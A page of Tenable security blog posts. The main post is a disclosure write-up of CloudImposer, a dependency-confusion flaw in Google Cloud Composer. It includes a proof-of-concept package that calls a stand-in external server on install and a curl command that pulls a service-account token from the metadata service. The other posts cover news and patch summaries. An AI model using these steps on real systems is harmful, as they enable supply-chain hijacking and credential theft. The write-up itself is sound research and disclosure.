CloudImposer: Executing Code on Millions of Google Servers with a Single Malicious Package

Tenable Blog
2 months ago

Tenable Research discovered a remote code execution (RCE) vulnerability in Google Cloud Platform (GCP) that is now fixed and that we dubbed CloudImposer. The vulnerability could have allowed an attacker to hijack an internal software dependency that Google pre-installs on each Google Cloud Composer pipeline-orchestration tool. Tenable Research also found risky guidance in GCP documentation that customers should be aware of.

TL;DR
  • Tenable Research discovered an RCE vulnerability we dubbed CloudImposer that could have allowed a malicious attacker to run code on potentially millions of servers owned by Google servers and by its customers.
  • Tenable Research discovered CloudImposer after finding documentation from GCP and the Python Software Foundation that could have put customers at risk of a supply chain attack called dependency confusion. The affected GCP services are App Engine, Cloud Function, and Cloud Composer. This research shows that although the dependency confusion attack technique was discovered several years ago, there’s a surprising and concerning lack of awareness about it and about how to prevent it even among leading tech vendors like Google. 
  • Supply chain attacks in the cloud are exponentially more harmful than on premises. For example, one malicious package in a cloud service can be deployed to – and harm – millions of users.
  • A combination of responsible security practices by both cloud providers and cloud customers can mitigate many risks associated with cloud supply chain attacks. Specifically, users should analyze their environments for their package installation process to prevent breaches, specifically the --extra-index-url argument in Python.
  • This research was presented at Black Hat USA 2024.
Supply chain attacks in the cloud

In supply chain attacks, attackers infiltrate the supply systems of legitimate providers. When the provider inadvertently distributes the compromised version of its software, its users become vulnerable to an attack, leading to widespread security breaches.

In the cloud, supply chain attacks escalate to a whole new level, almost like traditional attacks on steroids. The cloud's massive scale and widespread adoption, as well as its interconnected and distributed nature, magnify these threats.. 

This blog details a vulnerability Tenable Research discovered called CloudImposer that could have allowed attackers to conduct a massive supply chain attack by compromising the Google Cloud Platform’s Cloud Composer service for orchestrating software pipelines.

Specifically, CloudImposer could have allowed attackers to conduct a dependency confusion attack on Cloud Composer, a managed service version of the popular open-source Apache Airflow service.

A type of supply chain attack, dependency confusion happens when an attacker inserts a malicious software package in a software provider’s software registry. If the software provider inadvertently incorporates the malicious package in one of its products, the product becomes compromised.

The “apache-airflow” Python package of the Apache Airflow system - an open-source system that handles data pipelines and workflows - had been downloaded nearly 22 million times as of June 2024:

(Source: pypistats.org)

Consider Google Cloud Composer, Google's managed service version of Apache Airflow. With such a high adoption rate, the impact of a single malicious package deployed within Google Cloud Composer could be staggering. We're no longer talking about an isolated incident affecting just one server or data center; we're looking at a potential ripple effect that could compromise millions of users across numerous organizations.

These figures highlight the immense scale of the potential damage that attackers could have inflicted upon Google and its customers if they had exploited CloudImposer – millions of users across numerous organizations.

Because a single vulnerability in a specific cloud service can lead to widespread breaches, it’s essential to secure the entire software supply chain in the cloud.

What’s a dependency confusion attack?

 

 

Discovered by Alex Birsan in 2021, a dependency confusion attack starts when an attacker creates a malicious software package, gives it the same name as a legitimate internal package and publishes it to a public repository. When a developer's system or build process mistakenly pulls the malicious package instead of the intended internal one, the attacker gains access to the system. This attack exploits the trust developers place in package management systems and can lead to unauthorized code execution or data breaches.

The confusing and confused “--extra-index-url” argument

Specifically in Python, the popular argument that causes the confusion, is “--extra-index-url”:

 

 

This argument looks for the public registry (PyPI) in addition to the specified private registry from which the application or user intends to install the private dependency.

This behavior opens the door for attackers to carry out a dependency confusion attack: upload a malicious package with the same name as a legit package to hijack the package-installation process.

Because dependency confusion relies on package versioning, the technique exploits the fact that when “pip”, which is the name of the Python package installer, sees two registries, and two packages with the same name, it will prioritize the package with the higher version number. 

However, the CloudImposer vulnerability shows how dependency confusion can be exploited in stricter circumstances than the ones presented in a simple dependency confusion scenario. We will showcase a unique case-study with the CloudImposer, where it’ll get much more confusing, for us, and for pip ;)

GCP services research: Documentation gone wrong

One of our first findings were three instances of risky and ill-advised guidance for users of the GCP services App Engine, Cloud Function and Cloud Composer. Specifically, Google advised users who want to use private packages in these GCP services to use the “--extra-index-url” argument. 

We can infer that as for today, there are numerous GCP customers who followed this guidance, and use this argument when installing private packages in the affected services. These customers are at the risk of dependency confusion, and attackers might execute code on their environment.

See screenshots below of the GCP documentation we’re referring to.

 

(Source: Google Cloud Function documentation)

 

We didn’t stop with Google Cloud Function. We then analyzed the state of GCP regarding this risky argument we discussed, and used Google Dorking to find more problematic documentation:

 

 

(Source: Google App Engine documentation)

 

(Source: Google Cloud Composer documentation)

 

The question arises: Why?

Why did Google provide this recommendation? It appears there’s a general lack of awareness about dependency confusion risk. As we dove deeper into Google’s documentation, we found a prompt in the GCP Artifact Registry documentation for users to review Python’s Packaging documentation:

 

 

Delving deeper into the Python Packaging documentation, we can observe an interesting recommendation: Python advises users to host their own simple repositories – in other words, their private ones. And again Python recommends that these private-repository users install packages with the… “--extra-index-url” argument:

 

 


It appears that Google simply echoed the Python Software Foundation’s recommendation, which shows a huge knowledge gap about how to secure the installation of private packages.

Disclosure to Google

We reported the problematic documentation to Google, which then updated its documentation. We explain the documentation changes further down. 

Disclosure to the Python Software Foundation

We also reported the risky documentation of Python to the Python Software Foundation, which responded by sharing the following Python Enhancement Proposal (PEP) paper: “PEP 708 – Extending the Repository API to Mitigate Dependency Confusion Attacks”. This PEP was created in February 2023 but no implementation has been accepted or completed yet, so a dependency confusion risk remains for Python users.

CloudImposer vulnerability discoveryPre-installed Python packages

After finding Google’s risky recommendation for GCP customers to use the “--extra-index-url” argument when installing private packages, we wondered if Google itself followed this practice when installing private packages in their own internal services.

To find out, we looked first at Cloud Composer and found this table in its documentation:

 

 

Every time a user creates a Cloud Composer service, Google deploys an image of the Apache Airflow system.

Google also bundles the required services for Cloud Composer to work, including … PyPI packages. These PyPI packages would be pre-installed in potentially millions of Cloud Composer instances. 

Cloud Composer’s documentation reads: 

“Preinstalled PyPI packages are packages that are included in the Cloud Composer image of your environment. Each Cloud Composer image contains PyPI packages that are specific for your version of Cloud Composer and Airflow.”

The PyPI packages are public popular Python packages, but could some be internal Google packages?

The researcher mindset started to tingle.

Scanning for hijacking potential

The next order of business was to take the package list of Cloud Composer from the documentation and scan for missing packages from the public registry. We reasoned that if a package is missing from the public registry, it must be present in an internal one. 

We used the following mock-up Python code to complete the mission of scanning the packages:

import requests def check_packages(file_path): with open(file_path, 'r') as file: for package_name in file: package_name = package_name.strip() url = f'https://pypi.org/simple/{package_name}' response = requests.get(url) status_code = response.status_code print(f'Package: {package_name}, Status Code: {status_code}') if status_code != 200: print('This package is missing from the public registry:') print(f'Status Code: {status_code}, Package: {package_name}') check_packages('./package-names.txt')

The code checks if each package is present in the public registry, or not:

 

 

We found that the “google-cloud-datacatalog-lineage-producer-client” package is not present in the public registry, which opens the door for attackers to confuse the installation process.

Revealing Cloud Composer’s package installation process

To validate our theory, we revealed Cloud Composer’s package installation process by running code on our own Cloud Composer service. This is allowed by the nature of the service, and each ordinary user and customer of Google Cloud Composer can do it. We grepped the file system of the service for the internal package string: “google-cloud-datacatalog-lineage-producer-client” to try and reveal data, or any trail that will help with the research.

We found the following package metadata, which reveals bad news:

 

 

To install their own private package, the one that we found that is missing from the public registry, Google used the risky --extra-index-url argument.

A unique dependency confusion case study: Tackling versioning prioritization

We now have all of the ingredients for a dependency confusion attack: We found a package that is not present in the public registry, and that is installed in a risky way that allows attackers to upload a malicious package to the public registry, and take over the pipeline.

Back to the example of dependency confusion, we concluded that the assumption was that the installation is prioritized based on a package’s version. When we observed the pre-installed packages in the Cloud Composer documentation, we saw a barrier, but didn’t stop there:

 

 

The Cloud Composer documentation mentions that the package we found is version-pinned, meaning that pip will only install the package with this exact version number. If so, then a conventional dependency confusion attack technique wouldn’t be successful.

Unless, it will?

 

 

To our surprise, if “pip install” uses the “--extra-index-url” argument, it prioritizes the public registry, even if the two packages have identical versions and names, and if the version decision is version-pinned.

We then emulated the installation process on our own Cloud Composer instance, and crafted the proof-of-concept (POC.) The POC was a package that runs code on package installation. The code will send requests to our external server with the intention to validate we ran code in the targeted Google servers. We can validate whether they are owned by Google by inspecting the external IP:

import requests def hits_checker(): url = "https://mockup-external-poc-server.com" response = requests.get(url) if __name__ == "__main__": print(hits_checker())

We uploaded the POC package, with the same name of the internal Google’s package, and the same version:
 


And we started to get hundreds of requests, validating that we ran code in Google internal servers:
 

 

But then, we got blocked in a matter of seconds.

A hidden protection mechanism in PyPI?

To comply with the bug bounty and research rules, we went into PyPI to delete our POC package and our user after we validated that we ran code and that there was a risk.

But when we logged in into our user, suddenly we were presented with this message:

 

 

Turns out that our user and package got blocked by PyPI. Granted, we did not employ any evasion and stealth techniques since our purpose was to conduct research. Still, this is good news. We’re happy that PyPI has a defense mechanism designed to block real-world threats. 

Trails from the past

A user named “Feluxe” submitted a GitHub issue in 2018, asking about “pip install” with various indexes behavior:

 

 

Like us in 2024, Feluxe realized six years ago that PyPI, the public registry, is always prioritized.

The answer from the Python Software Foundation at the time was that this issue was unlikely to be addressed. Thus, the threat is real and still exists. Users should take actions and be aware of the aforementioned risks.

The aftermath: Going beyond RCE exploitation and the Jenga conceptThe Jenga concept

 

 

In our recent BlackHat USA 2024 talk: “The GCP Jenga Tower: Hacking Millions of Google's Servers With a Single Package (and more)”, we explored a new concept that is present in the major cloud providers.

We dubbed this concept “Jenga,” just like the game. Cloud providers build their services on top of each other. If one service gets attacked or is vulnerable, the other ones are prone to be impacted as well. This reality opens the door for attackers to discover novel privilege escalations and even vulnerabilities, and introduces new hidden risks for defenders.

Meet Jenganizer, a revealer of hidden services for AWS

To help cloud security teams get more visibility into cloud interconnected services, we released a new open-source tool named “Jenganizer” that maps the hidden services AWS builds behind the scenes:

 

(https://github.com/tenable/hidden-services-revealer)

 

Although Jenganizer works only for AWS, the issue it addresses – the complicated morass of interconnected cloud services layered on top of each other – affects all cloud providers. 

Beyond RCE: Abusing Jenga in Cloud Composer

We can apply the Jenga concept on Cloud Composer as well. Its infrastructure is built on GKE (Google Kubernetes Engine), another GCP service, just like the concept describes – a service built on top of another service.

Attackers could abuse CloudImposer by abusing GKE’s tactics, techniques, and procedures. After running code on Cloud Composer, attackers could run code on a pod, abuse the service by accessing the instance metadata service (IMDS), and get the attached service account from the deployed node to escalate their privileges and move laterally in the victim’s environment:

curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/[email protected]/token"Responsible disclosure

We responsibly disclosed the CloudImposer vulnerability, along with the risky documentation to Google. Google classified CloudImposer as an RCE vulnerability and responded promptly and professionally, demonstrating a commitment to security by thoroughly investigating the issue and taking appropriate actions to mitigate the risk.

The vulnerability fix and extra steps taken by GoogleCloudImposer fix

Following our report, Google fixed the vulnerable script that was utilizing the --extra-index-url argument when installing their private package from their private registry, in Google Cloud Composer.

Google also inspected the checksum of the vulnerable package instances, and notified us that, as far as Google knows, there is no evidence that the CloudImposer was ever exploited.

Google acknowledged that our code ran in Google’s internal servers, but said that it believes it wouldn’t have run in customers’ environments because it wouldn’t pass the integration tests.

Documentation issues

Google now recommends that GCP customers use the “--index-url” argument instead of the “–extra-index-url” argument. Google is also adopting our suggestion and recommending that GCP customers use the GCP Artifact Registry’s virtual repository to safely control pip search order:

 

 

The --index-url argument reduces the risk of dependency confusion attacks by only searching for packages in the registry that was defined as a given value for that argument.

Liv Matan

Cybersecurity Snapshot: Russia-backed Hackers Aim at Critical Infrastructure Orgs, as Crypto Fraud Balloons

Tenable Blog
2 months 1 week ago

Critical infrastructure operators must beware of Russian military hacking groups. Plus, cyber scammers are having a field day with crypto fraud. Meanwhile, AI and cloud vendors face stricter reporting regulations in the U.S. And get the latest on AI-model risk management and on cybersecurity understaffing!

Dive into six things that are top of mind for the week ending September 13.

1 - Critical infrastructure orgs targeted by Russia-backed hackers

Here’s an important warning for critical infrastructure organizations in the U.S. and abroad: Nation-state hacking groups affiliated with Russia’s military are attacking critical infrastructure targets to conduct espionage, carry out sabotage and inflict reputational harm.

That’s according to a joint advisory from the governments of the U.S. and nine other countries that details the groups’ tactics, techniques and procedures, lists indicators of compromise and offers mitigation recommendations.

The groups are affiliated with the Russian armed forces’ Unit 29155, according to the advisory “Russian Military Cyber Actors Target US and Global Critical Infrastructure” published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

These Unit 29155 groups have been operating since 2020. They’re currently focused on disrupting aid efforts to Ukraine, which they first attacked with the WhisperGate malware in early 2022. 

 

 

They also target critical infrastructure organizations in North Atlantic Treaty Organization (NATO) countries. Their attacks include defacing websites, stealing and leaking data, and scanning infrastructure.

To gain initial access, these hacking groups use VPNs to hide their actions and then target internet-facing systems’ weaknesses, including these vulnerabilities: 

Immediate steps that critical infrastructure organizations should take to protect themselves include:

  • Make it a priority to routinely update systems and to remediate known vulnerabilities exploited in the wild.
  • Segment networks.
  • Adopt phishing-resistant multi-factor authentication for all externally-facing account services.

To get more details, read:

To learn more about securing operational technology (OT) systems in critical infrastructure environments, check out these Tenable resources:

2 - Cyber crooks double down on crypto scams

Decentralized. Distributed. Speedy. Ephemeral. Irreversible.

These are some of the key characteristics of cryptocurrency transactions that make them irresistibly attractive to cybercriminals, as evidenced by a strong increase in both the number of crypto scams and total losses in 2023.

These findings come from the “2023 IC3 Cryptocurrency Report,” released this week by the FBI’s Internet Crime Complaint Center (IC3). Specifically, the IC3 received almost 69,500 crypto-related complaints last year. Losses amounted to $5.6 billion, a 45% increase over 2022. 

(Source: “2023 IC3 Cryptocurrency Report” from the FBI’s Internet Crime Complaint Center, September 2024)

Other report takeaways include:

  • Most of the losses – 70% – came from investment scams.
  • Crypto scams accounted for about 10% of all financial-fraud complaints, but they disproportionately generated almost 50% of total losses.
  • While most of the complaints fielded by IC3 originated in the U.S., it received complaints from victims in 200-plus countries.

The report unpacks multiple types of crypto investment-fraud schemes, detailing scammers’ tactics and offering detailed prevention tips.

For more information about crypto fraud:

VIDEO

How Americans Are Losing Their Life Savings To Crypto Fraud (CNBC)

3 - Uncle Sam wants more info from AI and cloud vendors

The AI regulatory landscape continues to expand. 

This week, developers of AI systems and providers of cloud services learned they may soon have to submit more detailed reports about their wares to the U.S. government.

Specifically, the U.S. Department of Commerce has proposed new rules for mandatory and detailed reporting about AI models and cloud computing clusters, due to concerns about hackers abusing powerful AI and cloud systems.

AI developers and cloud providers would have to submit information to the U.S. government about their development activities and about cybersecurity measures and testing.

 


 

“This proposed rule would help us keep pace with new developments in AI technology to bolster our national defense and safeguard our national security,” Secretary of Commerce Gina M. Raimondo said in a statement.

To get more information about trends in AI security and regulation:

4 - New risk management framework for AI and ML models

Concerned about the pitfalls faced by developers and users of AI and machine learning (ML) models? You might want to check out the Cloud Security Alliance’s paper “AI Model Risk Management Framework.

The 54-page document addresses common AI model risks, including:

  • Data quality issues
  • Flawed model selection, tuning and design
  • Implementation and operational mistakes

The CSA framework offers a “structured approach” to identify, assess, mitigate and monitor AI model risks. Its four pillars are:

  • Model cards, which detail model elements such as its purpose, training, capabilities, resistance to attacks, limitations and performance
  • Data sheets, which offer descriptions of the dataset used to create an AI model
  • Risk cards, which summarize an AI model’s key risks
  • Scenario planning, which outlines ways in which a model could malfunction or be abused

Framework Pillars for Responsible and Well-Informed Use of AI / ML

(Source: Cloud Security Alliance’s “AI Model Risk Management Framework,” July 2024)

“A comprehensive framework goes a long way to ensuring responsible development and enabling the safe and responsible use of beneficial AI/ML models, which in turn allows enterprises to keep pace with AI innovation,” Caleb Sima, Chair of the CSA AI Safety Initiative, said in a statement.

The paper’s intended audience includes AI and ML engineers and developers; data scientists; risk managers; compliance pros; and business executives.

According to the paper, the benefits of adopting a risk management framework for AI and ML models include more transparency, proactive risk mitigation and enhanced decision-making processes.

5 - U.S. gov’t tackles cyber understaffing with new campaign

Is your organization struggling to recruit cybersecurity pros? A new initiative from the U.S. government aims to connect potential candidates with employers.

With about 500,000 cybersecurity jobs vacant in the U.S., the White House has launched a two-month “sprint” campaign designed to help recruit candidates to fill these positions.

Called “Service for America,” the campaign kicked off in early September and runs through the end of October. Its goal: to boost the country’s cyber workforce via a variety of initiatives, such as job fairs.

“These jobs offer an opportunity to serve our country by protecting our national security, while also offering a personal path to prosperity,” Nation Cyber Director Harry Coker, Jr. wrote in the blog post “Service for America: Cyber Is Serving Your Country.” 

“Service for America” will aim to create awareness that people don’t need a technical degree or background to qualify for cybersecurity jobs. “Cyber professionals are part of a dynamic and diverse modern workforce and individuals from all backgrounds and disciplines have a place,” Coker, Jr. wrote.

 

 

“Service for America” is part of the “National Cyber Workforce and Education Strategy,” unveiled in mid-2023, which seeks, among other things, to:

  • Remove degree requirements from cybersecurity jobs, shifting instead to a skills-based approach
  • Expand apprenticeships that allow people to gain cybersecurity skills while at their current jobs
  • Encourage employers, academia, local governments and non-profit organizations to offer cybersecurity training and education in their local communities

The Office of the National Cyber Director is spearheading the “Service for America” campaign, in partnership with the Office of Management and Budget and the Office of Personnel Management.

To get more details, check out:

For more information about how organizations can improve recruitment of cyber pros:

6 - Report: Almost 5M cyber jobs open globally

And continuing with the topic of cybersecurity understaffing, the problem isn’t getting any better globally either.

There are 4.8 million vacant cybersecurity jobs worldwide, up 19% compared with 2023, with the primary causes being budget constraints and lack of qualified candidates, according to the “2024 ISC2 Cybersecurity Workforce Study.”

The number of cyber pros employed globally – 5.5 million – stayed flat from last year. Meanwhile, the world needs 10.2 million cyber pros to satisfy the workforce demand.

“At a time when organizations can least afford the cost, disruption and reputational damage of a cybersecurity incident, the profession is under its greatest pressure to maintain safety and security with fewer resources,” reads an ISC2 statement.

ISC2 plans to publish the report in October, but released key stats this week. 

 

 

Another number that stayed flat compared with 2023 was the percentage of respondents that reported having a shortage of cyber pros – 67%.

In addition to understaffing, organizations are also experiencing skills gaps. Specifically, 90% reported having technical skills gaps in their cybersecurity teams, with AI / ML skills the most commonly reported at 34%. 

Rounding out the top five cybersecurity tech-skills gaps were:

  • Cloud computing security (30%)
  • Zero Trust implementation (27%)
  • Digital forensics and incident response (25%)
  • A tie between application security and penetration testing, both at 24%

Meanwhile, 74% of respondents described the current threat landscape as the most challenging they’ve encountered in the last five years

The study is based on a worldwide survey of almost 16,000 cybersecurity practitioners and decision-makers.

If you’d like to explore career opportunities at Tenable, visit us at https://www.tenable.com/careers

Juan Perez

Microsoft’s September 2024 Patch Tuesday Addresses 79 CVEs (CVE-2024-43491)

Tenable Blog
2 months 1 week ago
  1. 7Critical
  2. 71Important
  3. 1Moderate
  4. 0Low

Microsoft addresses 79 CVEs with seven critical vulnerabilities and four zero-day vulnerabilities, including three that were exploited in the wild.

Microsoft patched 79 CVEs in its September 2024 Patch Tuesday release, with seven rated critical, 71 rated as important, and one rated as moderate.

This month’s update includes patches for:

  • Azure CycleCloud
  • Azure Network Watcher
  • Azure Stack
  • Azure Web Apps
  • Dynamics Business Central
  • Microsoft AutoUpdate (MAU)
  • Microsoft Dynamics 365 (on-premises)
  • Microsoft Graphics Component
  • Microsoft Management Console
  • Microsoft Office Excel
  • Microsoft Office Publisher
  • Microsoft Office SharePoint
  • Microsoft Office Visio
  • Microsoft Outlook for iOS
  • Microsoft Streaming Service
  • Power Automate
  • Role: Windows Hyper-V
  • SQL Server
  • Windows Admin Center
  • Windows AllJoyn API
  • Windows Authentication Methods
  • Windows DHCP Server
  • Windows Installer
  • Windows Kerberos
  • Windows Kernel-Mode Drivers
  • Windows Libarchive
  • Windows MSHTML Platform
  • Windows Mark of the Web (MOTW)
  • Windows Network Address Translation (NAT)
  • Windows Network Virtualization
  • Windows PowerShell
  • Windows Remote Access Connection Manager
  • Windows Remote Desktop Licensing Service
  • Windows Security Zone Mapping
  • Windows Setup and Deployment
  • Windows Standards-Based Storage Management Service
  • Windows Storage
  • Windows TCP/IP
  • Windows Update
  • Windows Win32K - GRFX
  • Windows Win32K - ICOMP

Elevation of privilege (EoP) vulnerabilities accounted for 38% of the vulnerabilities patched this month, followed by remote code execution (RCE) vulnerabilities at 29.1%.

CriticalCVE-2024-43491 | Microsoft Windows Update Remote Code Execution Vulnerability

CVE-2024-43491 is a RCE vulnerability in Microsoft Windows Update affecting Optional Components on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB). This was assigned a CVSSv3 score of 9.8, a maximum severity of critical and flagged by Microsoft as exploited in-the-wild.

This vulnerability stems from how the Servicing stack handled the applicability of Optional Components as a result of a triggered code defect. This began with a security update released on March 12, 2024 - KB5035858 (OS Build 10240.20526). The affected Optional Components were flagged as “not applicable” and reverted to their Release To Manufacturing (RTM) version. Microsoft notes that only optional components enabled from the following list are affected:

  • .NET Framework 4.6 Advanced Services \ ASP.NET 4.6
  • Active Directory Lightweight Directory Services
  • Administrative Tools
  • Internet Explorer 11
  • Internet Information Services\World Wide Web Services
  • LPD Print Service
  • Microsoft Message Queue (MSMQ) Server Core
  • MSMQ HTTP Support
  • MultiPoint Connector
  • SMB 1.0/CIFS File Sharing Support
  • Windows Fax and Scan
  • Windows Media Player
  • Work Folders Client
  • XPS Viewer

Successful exploitation would result in the rollback of previously mitigated vulnerabilities in the affected optional components in Windows 10 versions as specified above.

While this CVE has been labeled as exploited in-the-wild, confusingly Microsoft states that there is no evidence of direct exploitation of CVE-2024-43491,rather through observed rollbacks of CVEs related to Optional Components for Windows 10 (version 1507). Because some of these rolled back CVEs have been observed to have been exploited, this prompted Microsoft to apply the exploitability index assessment for this vulnerability as “Exploitation Detected.”

ImportantCVE-2024-38217 | Windows Mark of the Web Security Feature Bypass Vulnerability

CVE-2024-38217 is a security feature bypass vulnerability affecting Mark of the Web, an identifier used by Windows to mark files that have been downloaded from the internet. With a CVSSv3 score of 5.4, Microsoft notes that it was exploited in the wild and publicly disclosed prior to the patch becoming available. Successful exploitation of this vulnerability requires an attacker to convince a user into opening a specially crafted file that could evade Mark of the Web (MOTW) defenses.

Joe Desimone of Elastic Security published a blog post about the flaw in August, which includes an example of successful exploitation. The blog also highlights that Elastic Security "identified multiple samples in VirusTotal that exhibit the bug" with the oldest being submitted "over 6 years ago," indicating potential exploitation as far back as 2018. 

An additional Mark of the Web security feature bypass vulnerability, CVE-2024-43487, was also patched this month. With a severity rating of moderate and a CVSSv3 score of 6.5, this flaw was rated as “Exploitation Less Likely” according to the Microsoft Exploitability Index. As with CVE-2024-38217, successful exploitation would involve the attacker convincing a user to open a specially crafted file.

This is the second month in a row that a MOTW security feature bypass vulnerability was exploited in the wild as a zero-day, as Microsoft published an CVE-2024-38213 in August, though this flaw was originally patched as part of its June 2024 Patch Tuesday.

ImportantCVE-2024-38014 | Windows Installer Elevation of Privilege Vulnerability

CVE-2024-38014 is an EoP vulnerability affecting Windows Installer which was observed as being exploited as a zero-day. While Microsoft did not share any details on exploitation, the advisory does note that successful exploitation would grant the attacker SYSTEM level privileges. As with other EoP vulnerabilities, these vulnerabilities are often used as part of post-compromise activity in order to further compromise a network using elevated account privileges.

ImportantCVE-2024-38226 | Microsoft Publisher Security Features Bypass Vulnerability

CVE-2024-38226 is a security feature bypass vulnerability affecting Microsoft Publisher. This vulnerability was assigned a CVSSv3 score of 7.3 and has been exploited in the wild as a zero-day. In order to exploit this flaw, an attacker must be authenticated to a target system and convince a user to download a crafted file. This would allow a local attacker to bypass Office macro policies designed to block untrusted and potentially malicious files on the target’s system. According to the advisory, the Preview Pane is not an attack vector for this vulnerability.

ImportantCVE-2024-26186, CVE-2024-26191, CVE-2024-37335, CVE-2024-37338, CVE-2024-37339 and CVE-2024-37340 | Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability

CVE-2024-26186, CVE-2024-26191, CVE-2024-37335, CVE-2024-37338, CVE-2024-37339 and CVE-2024-37340 are a series of RCE vulnerabilities affecting Microsoft SQL Server Native Scoring. All six of these vulnerabilities are rated as important, were assigned a CVSSv3 score of 8.8, an exploitability index assessment of “Exploitation Less Likely” and were attributed to Andrew Ruddick with Microsoft Security Response Center.

Microsoft's FAQ for these vulnerabilities state “successful exploitation of this vulnerability requires an authenticated attacker to leverage SQL Server Native Scoring to apply pre-trained models to their data without moving it out of the database.” While the SQL Server vulnerabilities primarily enable unauthorized data manipulation, they could hypothetically lead to RCE if combined with additional security flaws or misconfigurations that allow SQL command execution.

ImportantCVE-2024-37337, CVE-2024-37342 and CVE-2024-37966 | Microsoft SQL Server Native Scoring Information Disclosure Vulnerability

CVE-2024-37337, CVE-2024-37342 and CVE-2024-37966 are information disclosure vulnerabilities affecting Microsoft SQL Server Native Scoring. All three of these vulnerabilities are rated as important, and were assigned a CVSSv3 score of 7.1 and exploitability index assessment of “Exploitation Less Likely.” These CVEs are also attributed to Andrew Ruddick with Microsoft Security Response Center, bringing the Microsoft SQL Server Native Scoring CVE count to seven in September’s Patch Tuesday release, accounting for over 10% of the CVEs this month. Successful exploitation of this vulnerability by a threat actor with authenticated access to Microsoft SQL Server Native Scoring could potentially allow the reading of small portions of heap memory. The disclosed memory could contain sensitive data, including user credentials, session tokens, or application-level information, which may lead to further security risks.

CriticalCVE-2024-38018 | Microsoft SharePoint Server Remote Code Execution Vulnerability

CVE-2024-38018 is a critical severity RCE affecting Microsoft SharePoint Server with a CVSSv3 score of 8.8 and an exploitability index assessment of “Exploitation More Likely.” While Microsoft has provided no information on exploitability, a threat actor would generally need to be authenticated and have sufficient permissions for page creation to take advantage of this RCE in Microsoft SharePoint Server.

Tenable Solutions

A list of all the plugins released for Microsoft’s September 2024 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.

For more specific guidance on best practices for vulnerability assessments, please refer to our blog post on How to Perform Efficient Vulnerability Assessments with Tenable.

Get more information

Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

Tenable Security Response Team

CVE-2021-20123, CVE-2021-20124: DrayTek Vulnerabilities Discovered by Tenable Research Added to CISA KEV

Tenable Blog
2 months 1 week ago

With patches out for three years, attackers have set their sights on a pair of vulnerabilities affecting DrayTek VigorConnect.

Background

In November 2021, the Cybersecurity and Infrastructure Security Agency (CISA) launched its Known Exploited Vulnerabilities (KEV) Catalog, an effort to focus on vulnerabilities known to have been exploited and provide defenders with an actionable list of vulnerabilities to prioritize their remediation efforts. On September 3, CISA added three new vulnerabilities to the KEV, two of which were discovered and responsibly disclosed to DrayTek by security researchers from Tenable Research.

CVEDescriptionCVSSv3VPRCVE-2021-20123DrayTek VigorConnect Unauthenticated Local File Inclusion / Path Traversal Vulnerability7.57.7CVE-2021-20124DrayTek VigorConnect Unauthenticated Local File Inclusion / Path Traversal Vulnerability7.57.7

*Please note: Tenable’s Vulnerability Priority Rating (VPR) scores are calculated nightly. This blog post was published on September 9 and reflects VPR at that time.

Analysis

CVE-2021-20123 and CVE-2021-20124 are local file inclusion vulnerabilities affecting the DownloadFileServlet and WebServlet endpoints on DrayTek VigorConnect, a network management software used to manage and configure DrayTek network devices. Using a specially crafted request with path traversal sequences, an unauthenticated attacker can download arbitrary files from the underlying operating system with root privileges. These vulnerabilities were discovered by researchers at Tenable and disclosed to DrayTek, which subsequently released a patch in October 2021.

Despite these vulnerabilities having readily available patches for three years, nefarious actors have been observed exploiting these unpatched flaws, earning their spot on the CISA KEV list. As we’ve examined in multiple reports, including our 2020, 2021 and 2022 Threat Landscape Reports, known and exploitable vulnerabilities continue to be targeted by threat actors. Simply stated, these vulnerabilities continue to be targeted because they have well-known exploit code and actors continue to find unpatched and vulnerable targets to attack.

Despite the hype, few targets appear to be publicly available

Using platforms such as Shodan.io and a basic query for “draytek” we can see that a staggering over 700,000 assets are returned. Looking closer we note that nearly 610,000 of these devices have port 1723 open, the port used for Point-to-Point Tunneling Protocol (PPTP) on DrayTek Vigor routers. Such a vast number of internet-facing DrayTek assets makes large-scale attacks tempting to threat actors.

Source: Shodan.io

Yet, if we look at the number of internet-facing assets on Shodan.io, specifically for DrayTek VigorConnect based on device title, certificate elements or the hash value of its favicon, we see that only a handful of assets are exposed.

Source: Shodan.io

Looking at other platforms like FOFA, using the VigorConnect favicon hash value as an example, we can see that while the number returned is larger than that of Shodan.io with 44 results (37 unique IPs) it is still a relatively small number.

Source: FOFA

Threat actors might target DrayTek VigorConnect, despite having fewer than 50 internet-facing assets, because of the ease of exploiting a smaller number of systems, which could be automated. Despite the size of its attack surface, VigorConnect could provide access to sensitive network configurations and its reduced complexity might allow attackers to navigate and persist undetected. This makes it a strategic target for establishing access to larger networks while staying under the radar.

Attacks are on the rise

CISA has not provided evidence on the source or level of attacks observed in the wild but, looking at data from Shadowserver — which provides statistics based on server-side attacks seen by their honeypot sensor network — we get some limited insights. Looking at activity for the vendor DrayTek from September 1, 2024 to September 9, the date this blog was published, we can see an uptick in activity for connections to Shadowserver devices for CVE-2021-20123 and CVE-2021-20124. It’s worth noting that while the level of activity is not huge, this is only on Shadowserver devices, which represent a small and specific subset of exposed devices reflecting CISAs warnings regarding observed active exploitation.

Source: Shadowserver

Proof of concept

As part of our responsible disclosure policy, Tenable regularly releases proof-of-concept (PoC) code with our Tenable Research Advisories (TRAs). In a coordinated release on October 8, 2021, Tenable released TRA-2021-42 which included PoCs for both CVE-2021-20123 and CVE-2021-20124.

Solution

DrayTek released VigorConnect version 1.6.1 on October 7, 2021, to address all of the vulnerabilities reported by Tenable Research.

Identifying affected systems

A list of Tenable plugins for this vulnerability can be found on the individual CVE pages for CVE-2021-20123 and CVE-2021-20124 as they’re released. These links will display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

Tenable Security Response Team

Cybersecurity Snapshot: RansomHub Group Triggers CISA Warning, While FBI Says North Korean Hackers Are Targeting Crypto Orgs

Tenable Blog
2 months 2 weeks ago

Cybersecurity teams must beware of RansomHub, a surging RaaS gang. Plus, North Korea has unleashed sophisticated social-engineering schemes against crypto employees. Meanwhile, a new SANS report stresses the importance of protecting ICS and OT systems. And a Tenable poll sheds light on cloud-native VM. And much more!

